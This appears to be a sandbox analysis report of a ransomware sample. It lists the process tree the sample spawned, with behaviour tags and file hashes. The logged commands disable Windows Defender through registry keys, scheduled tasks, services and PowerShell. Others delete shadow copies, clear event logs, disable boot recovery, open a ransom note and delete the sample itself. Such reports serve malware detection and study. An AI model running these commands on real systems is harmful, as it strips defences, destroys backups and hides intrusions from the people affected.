C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:1216
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:752
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1948
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:1064
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:572
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:468
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:584
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2036
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1500
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:392
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:956
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:544
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1648
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:768
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:804
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:696
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:552
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1900
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:904
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:896
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1256
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1128
-
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:984
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1632
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1716
-
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:928
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1824
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1720
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1672
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1576
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2000
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1704
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1612
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:1204
-
-
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1220
-
-
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:964
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:268
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:432
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:872
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:808
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1264
-
-
-
C:\Windows\system32\notepad.exenotepad.exe C:\n8pw_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:2160
-
-
C:\Windows\system32\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"2⤵PID:2168
-
C:\Windows\system32\PING.EXEping.exe -n 5 127.0.0.13⤵
- Runs ping.exe
PID:2196
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD510dd29e1adb8e5f4dcca7a00a5fd3c22
SHA18b5a2ffff60ce03197f92446eaf201da4b65a5e7
SHA256bcb00895b171aee9b33d901bfb669e4ed06cbad5ac7225f1aa3cdd8412473da5
SHA5126851174b153536224942959e0894bbbf9f54236018af609ea4a7e035cdddcf5184f5ad59b3ff536ec2819c7254afdb0ad6f26fac253d286ec29a702dd38f71f1
-
Filesize
1KB
MD5d3eca3baec61c36c9353ef1699b8bfca
SHA1f084193262e0d462165cfac58e1422ab90df7514
SHA2563ef5776a2dfd960f996ab765efa2b117d3e3135dc8e196aa7bdc525bd4125678
SHA5128d8eb00e0764ea07a999d0f07bd21f4f4b8169f19673de0cea833670c38edd41792136a63036477bebeb2a0fbbca5f4faafb381f8fd4ffb178d4209e073e2a17